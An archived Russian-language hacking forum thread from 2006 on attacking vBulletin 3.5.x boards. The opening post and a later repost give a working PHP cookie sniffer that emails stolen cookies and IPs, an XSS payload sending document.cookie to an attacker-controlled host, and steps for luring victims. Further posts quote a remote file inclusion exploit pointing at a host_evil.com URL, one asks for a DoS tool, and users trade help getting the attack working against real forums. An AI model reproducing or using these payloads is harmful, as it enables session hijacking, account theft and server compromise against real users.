Форум АНТИЧАТ - Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Уязвимости в vBulletin v3.5.x ( test: v3.5.4 ) (https://forum.antichat.xyz/showthread.php?t=17968)

liauliau

20.04.2006 18:06

Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

работает отлично! ;)

Код:

( 1 ) 



-------------------------------------------------------------------- 



Name file:  exploit.php 



-------------------------------------------------------------------- 





<?php 

$ip_adresse = $_SERVER['REMOTE_ADDR']; 

if(!empty($ip_adresse)) 

{ 

echo 'il tuo ip и: ',$ip_adresse; 

} 

else 

{ 

echo 'Impossible d\'afficher l\'IP'; 

} 

?> 



<a href="log.php"></a><? 

$xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 

$day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 

if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 

else $visitor_info = $REMOTE_HOST; 

$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 

$x1=`host $REMOTE_ADDR|grep Name`; 

$x2=$REMOTE_PORT; 

?> 



<?php 

$cookie = $_GET['c']; 

?> 



<?php 

$myemail = "YOUR ADDRESS E-MAIL"; 

$today = date("l, F j, Y, g:i a") ; 

$subject = "Xss Vbulletin" ; 

$message = "Xss: Hacking 

Ip: $ip_adresse 

Cookie: $cookie 

Url: $base 

porta usata: $xx1 

remote port: $x2 

Giorno & Ora : $today  \n 

"; 

$from = "From: $myemail\r\n"; 

mail($myemail, $subject, $message, $from); 

?> 







-------------------------------------------------------------------- 



<?php 

$myemail = "YOUR ADDRESS E-MAIL"; 



-------------------------------------------------------------------- 





( 2 ) 



-------------------------------------------------------------------- 



Name file:  image.gif 



-------------------------------------------------------------------- 





<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 





-------------------------------------------------------------------- 



location="http://YOUR ADDRESS WEB.com 



-------------------------------------------------------------------- 





( 3 ) 



-------------------------------------------------------------------- 



Like Using 

-------------------------------------------------------------------- 



1°  new thread 

2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 

3°  Submit 

4°  It waits for 



--------------------------------------------------------------------

pch	20.04.2006 19:31

Видимо, работает только при разрешённых html тэгах.
ИМХО - лажа

vectorg

20.04.2006 19:31

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?

liauliau

20.04.2006 21:14

Цитата:

Сообщение от VectorG

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?

video нужнa ?

limpompo

20.04.2006 21:23

liauliau - давай сними им видео а то до них это всё плохо доходит...

Lord Nikon

20.04.2006 21:24

слушай реально сними видео.=)

liauliau

20.04.2006 21:55

Цитата:

Сообщение от Lord Nikon

слушай реально сними видео.=)

ok ;) 1min

k1b0rg

20.04.2006 21:57

чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

сплойт гавно

liauliau

20.04.2006 22:23

короткое video тут

Azazel

20.04.2006 22:37

Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это

Код:

Remote File Inclusion in VBulletin ImpEx 

Date : 

12 / 4 / 2006 

Software :  

VBulletin ImpEx 

version : 



VBulletin 3.5.1

VBulletin 3.5.2

VBulletin 3.5.4



The bug reside in  : 



ImpExModule.php

ImpExController.php

ImpExDisplay.php



Exploit : 



(1)

www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id

(2)

www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id

(3)

www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id

Discovery by :

Dr.Jr7

GreeTz : 

special greet to Qptan & Mr.SNAKE  & trooq

and to my all frinds in www.lezr.com/vb

see u :}

k1b0rg

20.04.2006 22:54

Impex это модуль вроде бы?

Azazel

20.04.2006 23:09

Цитата:

Сообщение от k1b0rg

Impex это модуль вроде бы?

Похоже что да, ибо довольно часто натыкаюсь на 404.

micle

21.04.2006 08:54

а ниукого хотябы досера нету?
чтобы прокси обращались к поиску, а главное был бы sql запрос
и тогда у жертвы (в моем случае)повиснит форум т.к ограничено 20.000 запросами к БД

SanyaX

22.04.2006 22:48

Видео посмотрел там Xss просто.

Зверь

18.05.2006 21:05

А можно,это просто в новое сообщение в форуме вставить?
Там ХТМЛ разрешен

CaH9	18.05.2006 21:29

Уязвимости vBulletin v3.5.4

подскажите есть что нибудь под эту версию ??
p.s : тема ниже не работает

Зверь

18.05.2006 21:34

Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
И залить сплоит к себе ,так???

liauliau

18.05.2006 21:41

Цитата:

Сообщение от Зверь

Видео смотрел ???

CaH9	18.05.2006 22:59

Цитата:

Сообщение от liauliau

http://forum.antichat.ru/thread17968.html

тема работает ;)

html код выключен

nix	19.05.2006 06:55

Говно! хтмл практически у всех отключен! А Ipmex сплоит тож гавно, импех тока когда с движка форума каковонить пережаешь на воблу, потом этот скрипт все удаляют!

Зверь

19.05.2006 16:29

да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
На форуме хтмл код включен.Что можно сделать?
В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил

nix	20.05.2006 03:41

ГЫгы, это спотря какой снифер у тебя

Зверь

20.05.2006 14:44

Снифер из той же статья,настройка там всего одна,адрес почты

liauliau

20.05.2006 15:24

Цитата:

Сообщение от Зверь

дай адрес форумa - лп

Зверь

20.05.2006 15:46

liauliau-наисал в ЛП

liauliau

20.05.2006 19:05

Цитата:

Сообщение от Зверь

liauliau-наисал в ЛП

HTML код Выкл. :mad:

Зверь

20.05.2006 19:17

да включен там код хтмл,но не для всех,а толко для определеных групп...
Подскажи почему на сниф ничего неприходит?

Зверь

20.05.2006 19:21

Вот посмотри что неправильно в моих дейсивиях
1-Залил на сайт эксплоит с такими данными
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "shport-maksim@yandex.ru";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
2-на форуме просто в новом сообщении написал вот это
<pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
Что не ТАК?

Зверь

20.05.2006 19:23

liauliau-помоги пожалуйста.
У тебя есть аська?

liauliau

20.05.2006 19:37

Цитата:

Сообщение от Зверь

liauliau-помоги пожалуйста.
У тебя есть аська?

не знаю что ты там делаешь ? дай форум где включен код хтмл я тебе зделаю видео ;)

liauliau

20.05.2006 20:30

Цитата:

Сообщение от Зверь

liauliau-короче,вроде сработал,но в письме в поле куки ничего небыло

Видео > тут

Время: 10:04